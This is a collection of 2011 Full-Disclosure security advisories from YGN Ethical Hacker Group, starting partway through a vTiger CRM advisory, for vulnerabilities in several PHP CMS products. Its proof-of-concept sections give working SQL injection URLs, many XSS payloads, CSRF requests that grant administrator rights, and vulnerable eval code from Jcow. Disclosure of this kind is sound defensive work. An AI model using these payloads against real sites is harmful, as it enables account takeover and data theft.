5. PROOF-OF-CONCEPT/EXPLOIT

A future calendar event must be created in advance to trigger this
vulnerability.

Verified with Simple 1=1 Boolean check
-

/index.php?action=indexmodule=Calendarview=weekhour=0day=5month=12year=2011viewOption=listviewsubtab=eventparenttab=Myonlyforuser=1+or+1%3d1--

/index.php?action=indexmodule=Calendarview=weekhour=0day=5month=12year=2011viewOption=listviewsubtab=eventparenttab=Myonlyforuser=1+or+1%3d2--


Verified with MySQL @@version  check
-

/index.php?action=indexmodule=Calendarview=weekhour=0day=5month=12year=2011viewOption=listviewsubtab=eventparenttab=Myonlyforuser=1+or+@@version%3d5--

/index.php?action=indexmodule=Calendarview=weekhour=0day=5month=12year=2011viewOption=listviewsubtab=eventparenttab=Myonlyforuser=1+or+@@version%3d4--


6. SOLUTION

No patched version is available yet.
The vendor hasn't attempted to fix the issues though they acknowledged
the report.


7. VENDOR

vTiger Development Team
http://www.vtiger.com/


8. CREDIT

This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2010-12-08: notified vendor
2011-10-05: no fixed version released yet
2011-10-05: vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/%5BvTiger_5.2.1%5D_blind_sqlin
Wiki VtigerCRM: https://secure.wikimedia.org/wikipedia/en/wiki/Vtiger_CRM


#yehg [2011-10-05]

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] vTiger CRM 5.2.x = Multiple Cross Site Scripting Vulnerabilities

2011-10-04 Thread YGN Ethical Hacker Group
%20onmouseover%3d%27javascript:alert%28/XSS/%29%27%20x=%27parenttab=Myonlyforuser=1


Parameter:  type

Note: Move your mouse over the texts Potential No., Potential Name,..etc
/index.php?module=Potentialsaction=ListViewsales_stage=Prospectingclosingdate_start=2001-01-01closingdate_end=2100-01-01query=truetype=db%27%20onmouseover%3d%27javascript:alert%28/XSS/%29%27%20x=%27owner=adminviewname=10


Parameter:  view

/index.php?action=indexmodule=Calendarview=week'%20onload%3d%22alert%28/XSS/)%22%20x=%22hour=0day=5month=9year=2010viewOption=listviewsubtab=eventparenttab=Myonlyforuser=1


Parameter:  viewOption

/index.php?action=indexmodule=Calendarview=weekhour=0day=5month=9year=2010viewOption=listview%27%29%22%20%20onload%3d%22alert%28/XSS/%29%22%20x=%22subtab=eventparenttab=Myonlyforuser=1


Parameter:  viewname

/index.php?module=Calendaraction=CalendarAjaxfile=ListViewajax=changestateviewname=10'%20onmouseover=alert(/XSS/)%20x='errormsg=


Browser: IE 6, IE 7, FF 4 
XSS in Hidden Input Tag


Parameter:  activity_mode
Note: For this example, record id 116  needs to exist

/index.php?action=DetailViewmodule=Calendarrecord=116activity_mode=Task%22%20%20style=%22background-image:url(javascript:alert(0));width:1000px;height:1000px;display:block;%22%20x=%22Xparenttab=My


Parameter:  display_view

/index.php?module=Dashboardaction=indexdisplay_view=50%22%20%20style=%22background-image:url(javascript:alert(0));width:1000px;height:1000px;display:block;%22%20x=%22Xpbss_edit=true

Parameter:  folderid

/index.php?module=Reportsaction=SaveAndRunrecord=1folderid=17920%22%20%20style=%22background-image:url(javascript:alert(0));width:1000px;height:1000px;display:block;%22%20x=%22X

Parameter:  groupId

/index.php?module=Settingsaction=createnewgroupreturnaction=listgroupsparenttab=Settingsmode=editgroupId=2%22%20%20style=%22background-image:url(javascript:alert(0));width:1000px;height:1000px;display:block;%22%20x=%22X

Parameter:  mode

/index.php?module=Settingsaction=createroleroleid=H2parenttab=Settingsmode=edit%22%20style=%22background-image:url(javascript:alert(0));width:1000px;height:1000px;display:block;%22%20x=%22X

Parameter:  parent

index.php?module=Settingsaction=createroleparenttab=Settingsparent=H%22%20style=%22background-image:url('javascript:alert(0)');width:1000px;height:1000px;display:block;


Parameter:  profile_id
/index.php?module=Settingsaction=profilePrivilegesparenttab=Settingsprofileid=1%22%20style%3dbackground%2dimage%2durl('javascript:alert(0)')%3bwidth:1000px;height:1000px;display:block;%22%20x%3dmode=view


Parameter:  return_action
/index.php?module=Campaignsaction=EditViewrecord=124return_module=Campaignsreturn_action=index%20style%3dx%3aexpression(alert(1))%20x=sparenttab=Marketingreturn_viewname=29


Parameter:  return_module

/index.php?module=Campaignsaction=EditViewrecord=124return_module=Campaigns%20style%3dbackground-image%3aurl(javascript:alert(/XSS/))%20x=sreturn_action=indexparenttab=Marketingreturn_viewname=29


Parameter:  returnaction

/index.php?module=Settingsaction=createnewgroupreturnaction=listgroups%20style%3dbackground-image%3aurl(javascript:alert(/XSS/))%20x=sparenttab=Settingsmode=editgroupId=2


Parameter:  roleid

/index.php?module=Settingsaction=RoleDetailViewroleid=H2%20style%3dbackground-image%3aurl(javascript:alert(/XSS/))%20x=s


Parameter:  src_module
/index.php?module=Settingsaction=ModuleManagermodule_update=Step1src_module=Mobile3%20style%3dbackground-image%3aurl(javascript:alert(/XSS/))%20x=sparenttab=Setting


Parameter:  view
/index.php?action=indexmodule=Calendarview=week%20style%3dxss%3aexpression(alert(1))hour=0day=5month=9year=2010viewOption=listviewsubtab=eventparenttab=Myonlyforuser=1


6. SOLUTION

No patched version is available yet.
The vendor hasn't attempted to fix the issues though they acknowledged
the reports.


7. VENDOR

vTiger Development Team
http://www.vtiger.com/


8. CREDIT

This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2010-12-08: notified vendor
2011-10-04: no fixed version released yet
2011-10-04: vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/%5BvTiger_5.2.1%5D_XSS
Wiki VtigerCRM: https://secure.wikimedia.org/wikipedia/en/wiki/Vtiger_CRM


#yehg [2011-10-04]

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Joomla! 1.7.0 | Multiple Cross Site Scripting (XSS) Vulnerabilities

2011-09-28 Thread YGN Ethical Hacker Group
 Joomla! 1.7.0 | Multiple Cross Site Scripting (XSS) Vulnerabilities



1. OVERVIEW

Joomla! 1.7.0 (stable version) is vulnerable to multiple Cross Site
Scripting issues.


2. BACKGROUND

Joomla is a free and open source content management system (CMS) for
publishing content on the World Wide Web and intranets. It comprises a
model–view–controller (MVC) Web application framework that can also be
used independently.
Joomla is written in PHP, uses object-oriented programming (OOP)
techniques and software design patterns, stores data in a MySQL
database, and includes features such as page caching, RSS feeds,
printable versions of pages, news flashes, blogs, polls, search, and
support for language internationalization.


3. VULNERABILITY DESCRIPTION

Several parameters (searchword, extension, asset, author ) in Joomla!
Core components are not properly sanitized upon submission to the
/index.php url, which allows attacker to conduct Cross Site Scripting
attack. This may allow an attacker to create a specially crafted URL
that would execute arbitrary script code in a victim's browser.


4. VERSION AFFECTED

1.7.0 =


5. PROOF-OF-CONCEPT/EXPLOIT


component: com_search, parameter: searchword (Browser: IE, Konqueror)
=


[REQUEST]
POST /joomla17_noseo/index.php HTTP/1.1
Host: localhost
Accept: */*
Accept-Language: en
User-Agent: MSIE 8.0
Connection: close
Referer: http://localhost/joomla17_noseo
Content-Type: application/x-www-form-urlencoded
Content-Length: 456


task=searchItemid=435searchword=Search';onunload=function(){x=confirm(String.fromCharCode(89,111,117,39,118,101,32,103,111,116,32,97,32,109,101,115,115,97,103,101,32,102,114,111,109,32,65,100,109,105,110,105,115,116,114,97,116,111,114,33,10,68,111,32,121,111,117,32,119,97,110,116,32,116,111,32,103,111,32,116,111,32,73,110,98,111,120,63));alert(String.fromCharCode(89,111,117,39,118,101,32,103,111,116,32,88,83,83,33));};//xsssoption=com_search
[/REQUEST]




User Login is required to execute the following XSSes.


Parameter: extension, Component: com_categories


http://localhost/joomla17_noseo/administrator/index.php?option=com_categoriesextension=com_content%20%22onmouseover=%22alert%28/XSS/%29%22style=%22width:3000px!important;height:3000px!important;z-index:99;position:absolute!important;left:0;top:0;%22%20x=%22


Parameter: asset , Component: com_media


http://localhost/joomla17_noseo/administrator/index.php?option=com_mediaview=imagestmpl=componente_name=jform_articletextasset=1%22%20onmouseover=%22alert%28/XSS/%29%22style=%22width:3000px!important;height:3000px!important;z-index:99;position:absolute!important;left:0;top:0;%22x=%22author=


Parameter: author, Component: com_media


http://localhost/joomla17_noseo/administrator/index.php?option=com_mediaview=imagestmpl=componente_name=jform_articletextasset=author=1%22%20onmouseover=%22alert%28/XSS/%29%22style=%22width:3000px!important;height:3000px!important;z-index:99;position:absolute!important;left:0;top:0;%22x=%22





6. IMPACT

Attackers can compromise currently logged-in user/administrator
session and impersonate arbitrary user actions available under
/administrator/ functions.


7. SOLUTION

Upgrade to Joomla! 1.7.1-stable or higher.


8. VENDOR

Joomla! Developer Team
http://www.joomla.org


9. CREDIT

This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.


10. DISCLOSURE TIME-LINE

2011-07-29: notified vendor
2011-09-26: patched version, 1.7.1-stable, released
2011-09-29: vulnerability disclosed


11. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/joomla/core/%5Bjoomla_1.7.0-stable%5D_cross_site_scripting%28XSS%29
Vendor Advisory URLs:
http://developer.joomla.org/security/news/367-20110901-core-xss-vulnerability
http://developer.joomla.org/security/news/368-20110902-core-xss-vulnerability


#yehg [2011-09-29]

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Advanced Electron Forums (AEF) 1.0.9 = Cross Site Request Forgery (CSRF) Vulnerability

2011-09-25 Thread YGN Ethical Hacker Group
Advanced Electron Forums (AEF) 1.0.9 = Cross Site Request Forgery
(CSRF) Vulnerability



1. OVERVIEW

The Advanced Electron Forums (AEF)  1.0.9 = versions are vulnerable
to Cross Site Request Forgery (CSRF).


2. BACKGROUND

AEF has a very simple and easy to use Administration Panel and
installing this software is a piece of cake! You can install new
themes, customize themes the way you want. The User Control Panel has
a simple yet beautiful interface where users can set their preferences
for the board.


3. VULNERABILITY DESCRIPTION

Advanced Electron Forums (AEF) 1.0.9 =  versions contain a flaw that
allows a remote Cross-site Request Forgery (CSRF / XSRF) attack. The
flaw exists because the application does not require multiple steps or
explicit confirmation for sensitive transactions for majority of
administrator functions such as adding new user, assigning user to
administrative privilege. By using a crafted URL, an attacker may
trick the victim into visiting to his web page to take advantage of
the trust relationship between the authenticated victim and the
application. Such an attack could trick the victim into executing
arbitrary commands in the context of their session with the
application, without further prompting or verification.


4. VERSIONS AFFECTED

1.0.9 =


5. PROOF-OF-CONCEPT/EXPLOIT

The following request ecalates a normal user to an administrator.

[REQUEST]
POST /aef/index.php?act=editprofileuid=2 HTTP/1.1

username=testeremail=tester%40yehg.netu_member_group=1realname=title=location=gender=1privatetext=icq=yim=msn=aim=www=sig=editprofile=Edit+Profile
[/REQUEST]


6. SOLUTION

Partial fix is available.
The vendor released a single patch for the provided vulnerable
EditProfile functionality.
http://www.anelectron.com/downloads/index.php?act=downloadattachatid=59


7. VENDOR

Electron Inc.
http://www.anelectron.com/


8. CREDIT

This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2010-12-14: notified vendor through email, website contact form submission
2011-05-17: vendor released aef 1.0.9 without the CSRF fix
2011-09-06: vendor released separate patch about the CSRF fix
2011-09-26: vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/[aef-1.x]_cross_site_request_forgery
CSRF Wiki: 
https://secure.wikimedia.org/wikipedia/en/wiki/Cross-site_request_forgery



#yehg [2011-09-26]

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Jcow CMS 4.x:4.2 = , 5.x:5.2 = | Arbitrary Code Execution

2011-08-26 Thread YGN Ethical Hacker Group
Jcow CMS 4.x:4.2 = , 5.x:5.2 = | Arbitrary Code Execution



1. OVERVIEW

Jcow CMS versions  (4.x: 4.2 and lower, 5.x: 5.2 and lower) are
vulnerable to Arbitrary Code Execution.


2. BACKGROUND

Jcow is a flexible Social Networking software written in PHP. It can
help you to build a social network for your interests and passions, a
member community for your existing website and a social networking
site like facebook/myspace/twitter.


3. VULNERABILITY DESCRIPTION

The parameter attachment is not properly sanitized upon submission
to /index.php, which allows attacker to execute arbitrary PHP code of
his own.


4. VERSIONS AFFECTED

Free version:  4.x: 4.2 and lower
Commercial version:  5.x: 5.2 and lower


5. PROOF-OF-CONCEPT/EXPLOIT

http://dev.metasploit.com/redmine/attachments/1660/jcow_eval.rb

jcow 4.2.1:
file: /includes/libs/ss.inc.php
line: 167

$app = $_POST['attachment'];
if (strlen($app)  $app != 'status') {
include_once('modules/'.$app.'/'.$app.'.php');
$c_run = $app.'::ajax_post();';
eval($c_run);
exit;
}


jcow 5.2.0:
file: /includes/libs/ss.inc.php
line: 45

 $Vd2a57dc1 = $_POST['attachment']; if (strlen($Vd2a57dc1) 
$Vd2a57dc1 != 'status') {
 include_once('modules/'.$Vd2a57dc1.'/'.$Vd2a57dc1.'.php'); $Ve8200cee
= $Vd2a57dc1.'::ajax_post();';
eval($Ve8200cee); exit; }



6. SOLUTION

Free version users can upgrade to 4.3.1 or higher.
Commercial users can upgrade to 5.3 or higher.


7. VENDOR

Jcow CMS Development Team
http://www.jcow.net


8. CREDIT

This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2010-06-03: notified vendor
2010-06-03: vendor replied fix would be available within 48hrs
2011-08-24: vendor released fixed versions for 4.x and 5.x,
4.3.1 for free release
5.3 for commercial release
2011-08-26: vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/[jcow_4.2,5.2]_arbitrary_code_execution
Jcow CMS: 
http://sourceforge.net/projects/jcow/files/jcow4/jcow.4.2.1.zip/download


#yehg [2011-08-26]


-
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar
http://yehg.net
Our Lab | http://yehg.net/lab
Our Directory | http://yehg.net/hwd

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Jcow CMS 4.2 = | Cross Site Scripting

2011-08-26 Thread YGN Ethical Hacker Group
Jcow CMS 4.2 = | Cross Site Scripting


1. OVERVIEW

Jcow CMS 4.2 and lower versions are vulnerable to Cross Site Scripting.


2. BACKGROUND

Jcow is a flexible Social Networking software written in PHP. It can
help you to build a social network for your interests and passions, a
member community for your existing website and a social networking
site like facebook/myspace/twitter.


3. VULNERABILITY DESCRIPTION

The parameter g is not properly sanitized upon submission to
/index.php, which allows attacker to conduct Cross Site Scripting
attack. This may allow an attacker to create a specially crafted URL
that would execute arbitrary script code in a victim's browser.


4. VERSIONS AFFECTED

Jcow CMS 4.2 and lower


5. PROOF-OF-CONCEPT/EXPLOIT

File: /includes/libs/member.module.php:
Line 605: input type=hidden name=g value='.$_REQUEST['g'].' /

http://[target]/index.php?p=member/signupemail=username=password=fullname=birthyear=1991birthmonth=01birthday=01gender=0location=Myanmar++about_me=recaptcha_challenge_field=03AHJ_Vuvk8U6zCeSdrjB0GPDuwaRP-tPJ2G7u3Nm5LpmVSGmZs_CIP9I_C0PYZ1zYY6F42zpzGKQkxSiUhhyu-QhhwZA6oTlLNntgAgmRkDjfZpu3j4-bMeQNpOVh1afb4fZ4qwaIxHpP1wL8-8-LgkEBE5auAFmF_wrecaptcha_response_field=g=%22%3E%3Cscript%3Ealert%28/XSS/%29%3C/script%3Eonpost=1agree_rules=1


6. SOLUTION

Upgrade to 4.3.1 or higher.
The commercial version 5.x.x is not vulnerable.


7. VENDOR

Jcow CMS Development Team
http://www.jcow.net


8. CREDIT

This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2010-06-03: notified vendor
2010-06-03: vendor replied fix would be available within 48hrs
2011-08-24: vendor released fixed version, jcow.4.3.1.ce
2011-08-26: vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/[jcow_4.2]_cross_site_scripting
Jcow CMS: 
http://sourceforge.net/projects/jcow/files/jcow4/jcow.4.2.1.zip/download


#yehg [2011-08-26]


-
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar
http://yehg.net
Our Lab | http://yehg.net/lab
Our Directory | http://yehg.net/hwd

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Concrete CMS 5.4.1.1 = Cross Site Scripting

2011-08-22 Thread YGN Ethical Hacker Group
Concrete CMS 5.4.1.1  =  Cross Site Scripting


1. OVERVIEW

Concrete CMS 5.4.1.1  and lower versions are vulnerable to Cross Site Scripting.


2. BACKGROUND

Concrete5 makes running a website easy. Go to any page in your site,
and a editing toolbar gives you all the controls you need to update
your website. No intimidating manuals, no complicated administration
interfaces - just point and click.


3. VULNERABILITY DESCRIPTION

The rcID parameter is not properly sanitized, which allows attacker to
conduct Cross Site Scripting attack. This may allow an attacker to
create a specially crafted URL that would execute arbitrary script
code in a victim's browser.


4. VERSIONS AFFECTED

CMS 5.4.1.1  =


5. PROOF-OF-CONCEPT/EXPLOIT


vulnerable parameter: rcID

form action=http://[target]/Concrete/index.php/login/do_login/;
method=post
input type=hidden name=uName value=test /
input type=hidden name=uPassword value=test /
input type=hidden name=rcID value='
style=display:block;color:red;width:;height:;z-index:;top:0;left:0;background-image:url(javascript:alert(/XSS/));width:expression(alert(/XSS/));
onmouseover=alert(/XSS/)' /
input type=submit name=submit value=Get Concrete CMS 5.4.1.1 XSS /
/form


6. SOLUTION

Upgrade to 5.4.2 or higher.


7. VENDOR

Concrete CMS Developers
http://www.concrete5.org/


8. CREDIT

This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2011-04-14: vulnerability reported
2011-08-04: vendor released fixed version
2011-08-23: vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/[concrete_5.4.1.1]_cross_site_scripting
Project Home: http://www.concrete5.org/
Vendor Release Note:
http://www.concrete5.org/documentation/background/version_history/5-4-2-release-notes/



#yehg [2011-08-23]

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Elgg 1.7.10 = | Multiple Vulnerabilities

2011-08-18 Thread YGN Ethical Hacker Group
1. OVERVIEW

The Elgg 1.7.10 and lower versions are vulnerable to Cross Site
Scripting and SQL Injection.


2. BACKGROUND

Elgg is an award-winning social networking engine, delivering the
building blocks that enable businesses, schools, universities and
associations to create their own fully-featured social networks and
applications. Well-known Organizations with networks powered by Elgg
include: Australian Government, British Government, Federal Canadian
Government, MITRE, The World Bank, UNESCO, NASA, Stanford University,
Johns Hopkins University and more (http://elgg.org/powering.php)


3. VULNERABILITY DESCRIPTION

The internalname parameter is not properly sanitized, which allows
attacker to conduct Cross Site Scripting attack. This may allow an
attacker to create a specially crafted URL that would execute
arbitrary script code in a victim's browser. The tag_names is not
properly sanitized, which allows attacker to conduct SQL Injection
attack.


4. VERSIONS AFFECTED

Elgg 1.7.10 =


5. PROOF-OF-CONCEPT/EXPLOIT

- Cross Site Scripting

http://localhost/pg/embed/media?internalname=%20%22onmouseover=%22alert%28/XSS/%29%22style=%22width:3000px!important;height:3000px!important;z-index:99;position:absolute!important;left:0;top:0;%22%20x=%22

- SQL Injection  Info Disclosure

http://localhost/pg/search/?q=SQLinsearch_type=tagstag_names=location%27


6. SOLUTION

Upgrade to 1.7.11 or higher.


7. VENDOR

Curverider Ltd
http://www.curverider.co.uk/
http://elgg.org/


8. CREDIT

This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2011-08-01: vulnerability reported
2011-08-15: vendor released fixed version
2011-08-18: vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/[elgg_1710]_xss_sqlin
Project Home: http://elgg.org/
Vendor Release Note:
http://blog.elgg.org/pg/blog/brett/read/189/elgg-1711-released



#yehg [2011-08-18]

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] WebsiteBaker 2.8.1 = Cross Site Request Forgery (CSRF) Vulnerability

2011-08-13 Thread YGN Ethical Hacker Group
1. OVERVIEW

WebsiteBaker 2.8.1 and lower versions are vulnerable to Cross Site Request
Forgery (CSRF).


2. BACKGROUND

WebsiteBaker is a PHP-based Content Management System (CMS) designed with
one goal in mind: to enable its users to produce websites with ease.


3. VULNERABILITY DESCRIPTION

WebsiteBaker 2.8.1 and lower versions contain a flaw that allows a remote
Cross-site Request Forgery (CSRF / XSRF) attack. The flaw exists because the
application does not require multiple steps or explicit confirmation for
sensitive transactions for majority of administrator functions such as
adding new user. By using a crafted URL, an attacker may trick the victim
into visiting to his web page to take advantage of the trust relationship
between the authenticated victim and the application. Such an attack could
trick the victim into executing arbitrary commands in the context of their
session with the application, without further prompting or verification.


4. VERSIONS AFFECTED

2.8.1 =


5. PROOF-OF-CONCEPT/EXPLOIT

The following request adds an administrator.

[REQUEST]
POST /admin/users/add.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 193

user_id=username_fieldname=username_abcdefgusername_abcdefg=testpassword=testpassword2=testdisplay_name=testemail=tester%
40yehg.nethome_folder=groups%5B%5D=1active%5B%5D=1submit=Add
[/REQUEST]


6. SOLUTION

Upgrade to 2.8.2 or higher


7. VENDOR

WebsiteBaker Org e. V.
http://www.websitebaker2.org/


8. CREDIT

This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2011-01-26: notified vendor
2011-08-01: vendor released fix
2011-08-13: vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/[websitebaker-2.8.1]_cross_site_request_forgery


#yehg [2011-08-13]
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] WebsiteBaker 2.8.1 = Arbitrary File Upload Vulnerability

2011-08-13 Thread YGN Ethical Hacker Group
1. OVERVIEW

WebsiteBaker 2.8.1 and lower versions are vulnerable to Arbitrary File Upload.


2. BACKGROUND

WebsiteBaker helps you to create the website you want: A free, easy
and secure, flexible and extensible open source content management
system (CMS). Create new templates within minutes - powered by
(X)HTML, CSS and jQuery. With WebsiteBaker it's quite natural your
site is W3C-valid, SEO-friendly and accessible - there are no
limitations at all.


3. VULNERABILITY DESCRIPTION

WebsiteBaker 2.8.1 and lower versions contain a flaw related to the
/admin/media/upload.php script failing to restrict uploaded files with
extensions - .htaccess, .php4, .php5, .phtml. This may allow an
attacker to execute arbitrary PHP code. User account to WebsiteBaker
admin backend is required. Attacker could gain access it by way of
either brute force or CSRFing to currently-logged in admin users.


4. VERSIONS AFFECTED

2.8.1 =


5. SOLUTION

Upgrade to 2.8.2 or higher


6. VENDOR

WebsiteBaker Org e. V.
http://www.websitebaker2.org/


7. CREDIT

This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.


8. DISCLOSURE TIME-LINE

2011-01-26: notified vendor
2011-08-01: vendor released fix
2011-08-13: vulnerability disclosed


9. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/[websitebaker-2.8.1]_arbitrary_file_upload
http://www.gnucitizen.org/blog/cross-site-file-upload-attacks/


#yehg [2011-08-13]

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Mambo CMS 4.6.x (4.6.5) | SQL Injection

2011-08-11 Thread YGN Ethical Hacker Group
Mambo CMS 4.6.x (4.6.5) | SQL Injection


1. OVERVIEW

Mambo CMS 4.6.5 and lower versions are vulnerable to SQL Injection.


2. BACKGROUND

Mambo is a full-featured, award-winning content management system that can
be used for everything from simple websites to complex corporate
applications. It is used all over the world to power government portals,
corporate intranets and extranets, ecommerce sites, nonprofit outreach,
schools, church, and community sites. Mambo's power in simplicity also
makes it the CMS of choice for many small businesses and personal sites.


3. VULNERABILITY DESCRIPTION

The zorder parameter was not properly sanitized upon submission to the
administrator/index2.php url, which allows attacker to conduct  SQL
Injection attack. This could an attacker to inject or manipulate SQL queries
in the back-end database, allowing for the manipulation or disclosure of
arbitrary data.


4. VERSIONS AFFECTED

Tested on Mambo CMS 4.6.5


5. PROOF-OF-CONCEPT/EXPLOIT

http://localhost/mambo/administrator/index2.php?limit=10order[]=11boxchecked=0toggle=onsearch=sqlitask=limitstart=0cid[]=onzorder=-1OR
(SELECT  FROM(SELECT
COUNT(*),CONCAT(CHAR(58,98,112,101,58),(SELECT
(CASE WHEN (=) THEN 1 ELSE 0
END)),CHAR(58,110,100,107,58),FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY
x)a)filter_authorid=62hidemainmenu=0option=com_typedcontent


6. SOLUTION

The vendor seems to discontinue the development. It is recommended to use
another CMS in active development.


7. VENDOR

Mambo CMS Development Team
http://mambo-developer.org


8. CREDIT

This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2010-11-31: notified vendor through bug tracker
2011-08-12: no patched version released up to date
2011-08-12: vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/[mambo4.6_x]_sql_injection
Mambo CMS:
http://mambo-code.org/gf/download/frsrelease/388/791/MamboV4.6.5.zip


#yehg [2011-08-12]
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Elgg 1.7.9 = | Multiple Cross Site Scripting Vulnerabilities

2011-07-30 Thread YGN Ethical Hacker Group
Elgg 1.7.9 = | Multiple Cross Site Scripting Vulnerabilities



1. OVERVIEW

The Elgg 1.7.9 and lower versions are vulnerable to multiple Cross
Site Scripting.


2. BACKGROUND

Elgg is an award-winning social networking engine, delivering the
building blocks that enable businesses, schools, universities and
associations to create their own fully-featured social networks and
applications. Well-known Organizations with networks powered by Elgg
include: Australian Government, British Government, Federal Canadian
Government, MITRE, The World Bank, UNESCO, NASA, Stanford University,
Johns Hopkins University and more (http://elgg.org/powering.php)


3. VULNERABILITY DESCRIPTION

Several parameters (page_owner, content,internalname, QUERY_STRING)
are not properly sanitized, which allows attacker to conduct Cross
Site Scripting attack. This may allow an attacker to create a
specially crafted URL that would execute arbitrary script code in a
victim's browser.


4. VERSIONS AFFECTED

Elgg 1.7.9 =


5. PROOF-OF-CONCEPT/EXPLOIT


XSS (Browser All)

N.B. User login is required to execute.

vulnerable parameters: page_owner, content,internalname, QUERY_STRING
__

REQUEST:

http://localhost/elgg/mod/file/search.php?subtype=filepage_owner=%22%20style%3d%22position:fixed;width:1000px;height:1000px;display:block;left:0;top:0%22%20onmouseover%3d%22alert%28/XSS/%29%22%20x=%22f

http://localhost/elgg/mod/riverdashboard/?content=%22%20style%3d%22position:fixed;width:1000px;height:1000px;display:block;left:0;top:0%22%20onmouseover%3d%22alert%28/XSS/%29%22%20x=%22fcallback=true

http://localhost/elgg/pg/embed/upload?internalname=%22%20onmouseover%3d%22alert%28%27XSS%27%29%22%20style%3d%22position:fixed;width:1000px;height:1000px;display:block;left:0;top:0%22

http://localhost/elgg/pg/pages/edit/%22%20onmouseover%3d%22alert%28%27XSS%27%29%22%20style%3d%22position:fixed;width:1000px;height:1000px;display:block;left:0;top:0%22


XSS (Exploitable in Older versions of Browsers - IE/FF)
vulnerable parameters: send_to,container_guid
=

REQUEST:

http://localhost/elgg/pg/messages/compose/?send_to=%22%20style%3d%22background-image%3aurl%28javascript:alert%28/XSS/%29%29%22%20x=%22s


Portion of RESPONSE:

input type=hidden name=send_to value=
style=background-image:url(javascript:alert(/XSS/)) x=s /


REQUEST:

http://localhost/elgg/pg/pages/new/?container_guid=%22%20style%3d%22background-image%3aurl%28javascript:alert%28/XSS/%29%29%22%20x=%22


Portion of RESPONSE:

input type=hidden name=container_guid value=
style=background-image:url(javascript:alert(/XSS/)) x=s /



6. SOLUTION

Upgrade to 1.7.10 or higher.


7. VENDOR

Curverider Ltd
http://www.curverider.co.uk/
http://elgg.org/


8. CREDIT

This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2011-06-09: vulnerability reported
2011-06-14: vendor released fixed version
2011-07-30: vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/[elgg_179]_cross_site_scripting
Project Home: http://elgg.org/
XSS (owasp): http://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
CWE-79: http://cwe.mitre.org/data/definitions/79.html


#yehg [2011-07-30]


-
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar
http://yehg.net
Our Lab | http://yehg.net/lab
Our Directory | http://yehg.net/hwd

___
